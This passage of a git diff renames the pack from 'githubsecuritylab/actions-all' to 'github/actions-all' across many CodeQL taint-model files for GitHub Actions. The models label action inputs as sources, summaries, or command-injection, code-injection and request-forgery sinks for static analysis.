diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml
index f2331633485c..e8d4aa790a66 100644
--- a/ql/lib/ext/jsdaniell_create-json.model.yml
+++ b/ql/lib/ext/jsdaniell_create-json.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"]
diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml
index e492f6012788..8fde3e0c110f 100644
--- a/ql/lib/ext/jurplel_install-qt-action.model.yml
+++ b/ql/lib/ext/jurplel_install-qt-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"]
diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
index a821b049232a..e9b04f2806f6 100644
--- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml
+++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"]
diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
index 4f9f887caf1f..386baaf2f95a 100644
--- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
+++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"]
diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
index 365f3ac98f88..d9c7d33c86f4 100644
--- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
+++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml
index f42e84655338..016a8ebc8cfa 100644
--- a/ql/lib/ext/leafo_gh-actions-lua.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"]
diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
index e21b52241667..d358aa238931 100644
--- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
+++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"]
diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
index 6c4a5931b98f..f37bcbd62973 100644
--- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml
+++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index c7e89697afb6..05acda9aac9d 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mad9000/actions-find-and-replace-string", "*", "input.source", "output.value", "taint", "manual"]
diff --git a/ql/lib/ext/magefile_mage-action.model.yml b/ql/lib/ext/magefile_mage-action.model.yml
index aa8496038365..4b0c810d2304 100644
--- a/ql/lib/ext/magefile_mage-action.model.yml
+++ b/ql/lib/ext/magefile_mage-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["magefile/mage-action", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/maierj_fastlane-action.model.yml b/ql/lib/ext/maierj_fastlane-action.model.yml
index ae869b6b5313..acdf3ead4a41 100644
--- a/ql/lib/ext/maierj_fastlane-action.model.yml
+++ b/ql/lib/ext/maierj_fastlane-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maierj/fastlane-action", "*", "input.lane", "command-injection", "manual"]
diff --git a/ql/lib/ext/manusa_actions-setup-minikube.model.yml b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
index 9f5801b79c04..b138d59c57ef 100644
--- a/ql/lib/ext/manusa_actions-setup-minikube.model.yml
+++ b/ql/lib/ext/manusa_actions-setup-minikube.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["manusa/actions-setup-minikube", "*", "input.kubernetes_version", "command-injection", "manual"]
diff --git a/ql/lib/ext/marocchino_on_artifact.model.yml b/ql/lib/ext/marocchino_on_artifact.model.yml
index a4a473b8efd2..63b236f32add 100644
--- a/ql/lib/ext/marocchino_on_artifact.model.yml
+++ b/ql/lib/ext/marocchino_on_artifact.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSourceModel data: - ["marocchino/on_artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/mattdavis0351_actions.model.yml b/ql/lib/ext/mattdavis0351_actions.model.yml
index 10a03e4d1863..0c6debc5d5e4 100644
--- a/ql/lib/ext/mattdavis0351_actions.model.yml
+++ b/ql/lib/ext/mattdavis0351_actions.model.yml
@@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mattdavis0351/actions", "*", "input.image-name", "output.imageUrl", "taint", "manual"] - ["mattdavis0351/actions", "*", "input.tag", "output.imageUrl", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mattdavis0351/actions", "*", "input.repo-token", "command-injection", "manual"]
diff --git a/ql/lib/ext/meteorengineer_setup-meteor.model.yml b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
index 9af82b985f31..b72bd69e6255 100644
--- a/ql/lib/ext/meteorengineer_setup-meteor.model.yml
+++ b/ql/lib/ext/meteorengineer_setup-meteor.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["meteorengineer/setup-meteor", "*", "input.meteor-release", "command-injection", "manual"]
diff --git a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
index 3b779d0b86d8..fec2376377e0 100644
--- a/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
+++ b/ql/lib/ext/metro-digital_setup-tools-for-waas.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["metro-digital/setup-tools-for-waas", "*", "input.gcp_sa_key", "env.GCLOUD_PROJECT", "taint", "manual"]
diff --git a/ql/lib/ext/microsoft_setup-msbuild.model.yml b/ql/lib/ext/microsoft_setup-msbuild.model.yml
index 6ad087730e41..3201ac370b48 100644
--- a/ql/lib/ext/microsoft_setup-msbuild.model.yml
+++ b/ql/lib/ext/microsoft_setup-msbuild.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/setup-msbuild", "*", "input.vs-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
index fa9c19583524..59c6e39515e6 100644
--- a/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
+++ b/ql/lib/ext/mishakav_pytest-coverage-comment.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mishakav/pytest-coverage-comment", "*", "input.multiple-files", "output.summaryReport", "taint", "manual"]
diff --git a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
index 6bfaffb2bbab..06371eebae21 100644
--- a/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
+++ b/ql/lib/ext/mr-smithers-excellent_docker-build-push.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mr-smithers-excellent/docker-build-push", "*", "input.tags", "command-injection", "manual"]
diff --git a/ql/lib/ext/msys2_setup-msys2.model.yml b/ql/lib/ext/msys2_setup-msys2.model.yml
index 03fa8beaf0b3..a12a478d9bd9 100644
--- a/ql/lib/ext/msys2_setup-msys2.model.yml
+++ b/ql/lib/ext/msys2_setup-msys2.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.install", "command-injection", "manual"]
diff --git a/ql/lib/ext/mxschmitt_action-tmate.model.yml b/ql/lib/ext/mxschmitt_action-tmate.model.yml
index a4ccaac2d2e0..28357d5f4689 100644
--- a/ql/lib/ext/mxschmitt_action-tmate.model.yml
+++ b/ql/lib/ext/mxschmitt_action-tmate.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mxschmitt/action-tmate", "*", "input.tmate-server-rsa-fingerprint", "command-injection", "manual"]
diff --git a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
index 7c32705dde54..cfdff1898aee 100644
--- a/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
+++ b/ql/lib/ext/mymindstorm_setup-emsdk.model.yml
@@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "env.EMSDK", "taint", "manual"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mymindstorm/setup-emsdk", "*", "input.actions-cache-folder", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-chromedriver.model.yml b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
index 902483f43997..f4ad5f7292b4 100644
--- a/ql/lib/ext/nanasess_setup-chromedriver.model.yml
+++ b/ql/lib/ext/nanasess_setup-chromedriver.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-chromedriver", "*", "input.chromedriver-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nanasess_setup-php.model.yml b/ql/lib/ext/nanasess_setup-php.model.yml
index be86a330b97e..872b4e243d71 100644
--- a/ql/lib/ext/nanasess_setup-php.model.yml
+++ b/ql/lib/ext/nanasess_setup-php.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nanasess/setup-php", "*", "input.php-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/nick-fields_retry.model.yml b/ql/lib/ext/nick-fields_retry.model.yml
index 0a6f7c347226..bd53ab3d65a2 100644
--- a/ql/lib/ext/nick-fields_retry.model.yml
+++ b/ql/lib/ext/nick-fields_retry.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nick-fields/retry", "*", "input.on_retry_command", "command-injection", "manual"]
diff --git a/ql/lib/ext/octokit_graphql-action.model.yml b/ql/lib/ext/octokit_graphql-action.model.yml
index 613b3e0fc59f..db650eeb7c76 100644
--- a/ql/lib/ext/octokit_graphql-action.model.yml
+++ b/ql/lib/ext/octokit_graphql-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/graphql-action", "*", "input.query", "request-forgery", "manual"]
diff --git a/ql/lib/ext/octokit_request-action.model.yml b/ql/lib/ext/octokit_request-action.model.yml
index 489d47ac71e9..34d63f31ca86 100644
--- a/ql/lib/ext/octokit_request-action.model.yml
+++ b/ql/lib/ext/octokit_request-action.model.yml
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["octokit/request-action", "*", "input.route", "request-forgery", "manual"]
diff --git a/ql/lib/ext/olafurpg_setup-scala.model.yml b/ql/lib/ext/olafurpg_setup-scala.model.yml
index 4a98ecd4af16..02d6d804699a 100644
--- a/ql/lib/ext/olafurpg_setup-scala.model.yml
+++ b/ql/lib/ext/olafurpg_setup-scala.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["olafurpg/setup-scala", "*", "input.jabba-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/paambaati_codeclimate-action.model.yml b/ql/lib/ext/paambaati_codeclimate-action.model.yml
index 57dc40ef6b8b..46fb5fd7dd6d 100644
--- a/ql/lib/ext/paambaati_codeclimate-action.model.yml
+++ b/ql/lib/ext/paambaati_codeclimate-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["paambaati/codeclimate-action", "*", "input.coverageCommand", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-evans_create-pull-request.model.yml b/ql/lib/ext/peter-evans_create-pull-request.model.yml
index 3b92f667ae90..0aab8b946328 100644
--- a/ql/lib/ext/peter-evans_create-pull-request.model.yml
+++ b/ql/lib/ext/peter-evans_create-pull-request.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["peter-evans/create-pull-request", "*", "input.branch", "command-injection", "manual"]
diff --git a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
index da8b02312ea0..62bb26ba1ff5 100644
--- a/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
+++ b/ql/lib/ext/peter-murray_issue-body-parser-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["peter-murray/issue-body-parser-action", "*", "output.*", "text", "manual"]
diff --git a/ql/lib/ext/plasmicapp_plasmic-action.model.yml b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
index c06d13301d27..dfacbbc14f46 100644
--- a/ql/lib/ext/plasmicapp_plasmic-action.model.yml
+++ b/ql/lib/ext/plasmicapp_plasmic-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["plasmicapp/plasmic-action", "*", "input.project_id", "command-injection", "manual"]
diff --git a/ql/lib/ext/preactjs_compressed-size-action.model.yml b/ql/lib/ext/preactjs_compressed-size-action.model.yml
index 61935c36f7d6..b258b619b6c5 100644
--- a/ql/lib/ext/preactjs_compressed-size-action.model.yml
+++ b/ql/lib/ext/preactjs_compressed-size-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["preactjs/compressed-size-action", "*", "input.build-script", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_flake8.model.yml b/ql/lib/ext/py-actions_flake8.model.yml
index 89f61cedc422..76b0c1d7d32c 100644
--- a/ql/lib/ext/py-actions_flake8.model.yml
+++ b/ql/lib/ext/py-actions_flake8.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["py-actions/flake8", "*", "input.flake8-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/py-actions_py-dependency-install.model.yml b/ql/lib/ext/py-actions_py-dependency-install.model.yml
index 1aabfc23fc4b..587519e948b5 100644
--- a/ql/lib/ext/py-actions_py-dependency-install.model.yml
+++ b/ql/lib/ext/py-actions_py-dependency-install.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["py-actions/py-dependency-install", "*", "input.path", "command-injection", "manual"]
diff --git a/ql/lib/ext/pyo3_maturin-action.model.yml b/ql/lib/ext/pyo3_maturin-action.model.yml
index d55fdbc3ea98..58cbf9cc7423 100644
--- a/ql/lib/ext/pyo3_maturin-action.model.yml
+++ b/ql/lib/ext/pyo3_maturin-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["pyo3/maturin-action", "*", "input.before-script-linux", "command-injection", "manual"]
diff --git a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
index d01ac86d3178..cc39018b9b1f 100644
--- a/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
+++ b/ql/lib/ext/reactivecircus_android-emulator-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["reactivecircus/android-emulator-runner", "*", "input.api-level", "command-injection", "manual"]
diff --git a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
index bab76cbe27ff..a0b5bc0dee41 100644
--- a/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
+++ b/ql/lib/ext/redhat-plumbers-in-action_download-artifact.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 - ["redhat-plumbers-in-action/download-artifact", "*", "output.*", "artifact", "manual"]
diff --git a/ql/lib/ext/reggionick_s3-deploy.model.yml b/ql/lib/ext/reggionick_s3-deploy.model.yml
index 02ac5032c797..89d91208ad46 100644
--- a/ql/lib/ext/reggionick_s3-deploy.model.yml
+++ b/ql/lib/ext/reggionick_s3-deploy.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["reggionick/s3-deploy", "*", "input.bucket", "command-injection", "manual"]
diff --git a/ql/lib/ext/renovatebot_github-action.model.yml b/ql/lib/ext/renovatebot_github-action.model.yml
index 0c484d44549b..65a4cc606528 100644
--- a/ql/lib/ext/renovatebot_github-action.model.yml
+++ b/ql/lib/ext/renovatebot_github-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["renovatebot/github-action", "*", "input.renovate-image", "command-injection", "manual"]
diff --git a/ql/lib/ext/roots_issue-closer-action.model.yml b/ql/lib/ext/roots_issue-closer-action.model.yml
index c088c7a644eb..d82962aa0969 100644
--- a/ql/lib/ext/roots_issue-closer-action.model.yml
+++ b/ql/lib/ext/roots_issue-closer-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["roots/issue-closer-action", "*", "input.issue-close-message", "code-injection", "manual"]
diff --git a/ql/lib/ext/ros-tooling_setup-ros.model.yml b/ql/lib/ext/ros-tooling_setup-ros.model.yml
index 5b22ac1f5fe8..32622271d6a3 100644
--- a/ql/lib/ext/ros-tooling_setup-ros.model.yml
+++ b/ql/lib/ext/ros-tooling_setup-ros.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["ros-tooling/setup-ros", "*", "input.required-ros-distributions", "command-injection", "manual"]
diff --git a/ql/lib/ext/ruby_setup-ruby.model.yml b/ql/lib/ext/ruby_setup-ruby.model.yml
index 3329a255e6f8..8dbc5ee2aded 100644
--- a/ql/lib/ext/ruby_setup-ruby.model.yml
+++ b/ql/lib/ext/ruby_setup-ruby.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "output.ruby-prefix", "taint", "manual"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["ruby/setup-ruby", "*", "input.ruby-version", "command-injection", "manual"]
diff --git a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
index 14a1cdeed86a..0bbd6364b5e0 100644
--- a/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
+++ b/ql/lib/ext/salsify_action-detect-and-tag-new-version.model.yml
@@ -1,11 +1,11 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.tag-template", "output.tag", "taint", "manual"]
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["salsify/action-detect-and-tag-new-version", "*", "input.version-command", "command-injection", "manual"]
diff --git a/ql/lib/ext/sergeysova_jq-action.model.yml b/ql/lib/ext/sergeysova_jq-action.model.yml
index 49931d93f885..6d6ec4a393e5 100644
--- a/ql/lib/ext/sergeysova_jq-action.model.yml
+++ b/ql/lib/ext/sergeysova_jq-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["sergeysova/jq-action", "*", "input.cmd", "code-injection", "manual"]
diff --git a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
index 37d0014bcbb4..78737c6bb8bd 100644
--- a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
+++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"]
diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
index 9058c9fb984c..64d5aac33ab8 100644
--- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
+++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"]
diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
index 713c5c61cea7..c921df3fa7d0 100644
--- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
+++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"]
\ No newline at end of file
diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml
index 40b02283152a..623483db63ec 100644
--- a/ql/lib/ext/snow-actions_eclint.model.yml
+++ b/ql/lib/ext/snow-actions_eclint.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"]
diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
index c08505f97477..5184c3c4c48c 100644
--- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml
+++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"]
diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml
index 6305fd339604..c898d41c8387 100644
--- a/ql/lib/ext/step-security_harden-runner.model.yml
+++ b/ql/lib/ext/step-security_harden-runner.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"]
diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
index 739880968188..d7c874c77870 100644
--- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml
+++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"]
diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml
index ee9a0dbb32a6..398dfb5c766c 100644
--- a/ql/lib/ext/tibdex_backport.model.yml
+++ b/ql/lib/ext/tibdex_backport.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSinkModel
 data:
 - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"]
diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml
index f056cf5d8644..872964f8215f 100644
--- a/ql/lib/ext/timheuer_base64-to-file.model.yml
+++ b/ql/lib/ext/timheuer_base64-to-file.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSummaryModel
 data:
 - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"]
diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml
index 838f0b308487..91f3c056e6de 100644
--- a/ql/lib/ext/tj-actions_branch-names.model.yml
+++ b/ql/lib/ext/tj-actions_branch-names.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
- pack: githubsecuritylab/actions-all
+ pack: github/actions-all
 extensible: actionsSourceModel
 data:
 # https://github.com/tj-actions/branch-names
diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml
index c215755f61dd..79a12582e9e4 100644
--- a/ql/lib/ext/trilom_file-changes-action.model.yml
+++ b/ql/lib/ext/trilom_file-changes-action.model.yml
@@ -1,6 +1,6 @@
 extensions:
 - addsTo:
